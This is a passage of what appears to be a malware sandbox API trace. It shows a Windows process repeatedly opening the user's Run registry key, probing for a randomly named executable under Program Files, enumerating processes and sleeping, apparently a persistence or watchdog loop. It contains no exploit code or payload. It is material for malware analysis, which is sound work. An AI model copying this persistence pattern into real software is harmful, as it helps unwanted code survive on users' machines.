SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0283.280] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0283.280] NtClose (Handle=0x338) returned 0x0 [0283.280] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.280] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.280] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0283.280] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.280] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.280] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0283.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0283.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0283.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0283.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0283.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0283.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.390] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0283.391] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0283.393] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0283.393] NtClose (Handle=0x338) returned 0x0 [0283.393] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.393] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.393] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0283.393] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.393] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.393] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0283.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0283.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0283.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0283.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0283.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0283.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.532] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0283.533] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0283.534] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0283.534] NtClose (Handle=0x338) returned 0x0 [0283.535] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.535] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.535] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0283.535] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.535] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.535] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0283.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0283.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0283.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0283.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0283.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0283.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.644] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0283.646] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0283.646] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0283.646] NtClose (Handle=0x338) returned 0x0 [0283.647] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.647] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.647] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0283.647] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.647] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.647] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0283.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0283.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0283.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0283.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0283.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0283.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.774] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0283.776] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0283.777] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0283.777] NtClose (Handle=0x338) returned 0x0 [0283.777] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.777] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.777] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0283.777] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.778] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.778] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0283.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0283.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0283.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0283.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0283.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0283.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.916] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0283.918] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0283.920] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0283.920] NtClose (Handle=0x338) returned 0x0 [0283.920] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.920] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.920] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0283.920] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0283.920] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0283.920] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0283.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0283.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0283.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0283.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0283.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0284.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.104] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0284.112] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0284.112] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0284.112] NtClose (Handle=0x338) returned 0x0 [0284.112] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.112] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0284.113] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de1a0) returned 1 [0284.113] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.113] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) 